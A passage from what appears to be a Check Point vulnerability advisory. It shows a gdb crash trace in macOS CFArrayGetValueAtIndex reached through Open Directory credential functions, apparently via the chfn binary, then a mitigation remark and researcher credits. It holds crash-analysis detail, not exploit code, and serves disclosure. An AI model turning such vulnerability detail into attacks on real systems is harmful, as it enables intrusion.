<CFArrayGetValueAtIndex+101>: mov $0x28,%al 0x92237217 <CFArrayGetValueAtIndex+103>: cmp $0xc,%ecx 0x9223721a <CFArrayGetValueAtIndex+106>: mov $0x14,%dl 0x9223721c <CFArrayGetValueAtIndex+108>: cmovne %edx,%eax 0x9223721f <CFArrayGetValueAtIndex+111>: add %esi,%eax 0x92237221 <CFArrayGetValueAtIndex+113>: mov 0xc(%ebp),%edx 0x92237224 <CFArrayGetValueAtIndex+116>: lea (%eax,%edx,4),%eax 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax <----- Crash here. (gdb) x/i $pc 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax (gdb) i r $eax eax 0x585d910 92657936 (gdb) bt #0 0x92237227 in CFArrayGetValueAtIndex () #1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory () #2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory () #3 0x9224b7b0 in _CFBundleGetLanguageSearchList () #4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory () #5 0x9224b7b0 in _CFBundleGetLanguageSearchList () #6 0x9225b50c in CFBundleCopyResourceURL () #7 0x9225bb32 in CFBundleCopyLocalizedString () #8 0x903633eb in _ODNodeSetCredentials () #9 0x90369813 in ODRecordSetNodeCredentials () #10 0x000044be in ?? () #11 0x000026ac in ?? () #12 0x000022ee in ?? () The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability. CREDITS This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). ACKNOWLEDGES Many thanks to Rafael Silva who brought the issue in chfn binary to our attention. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense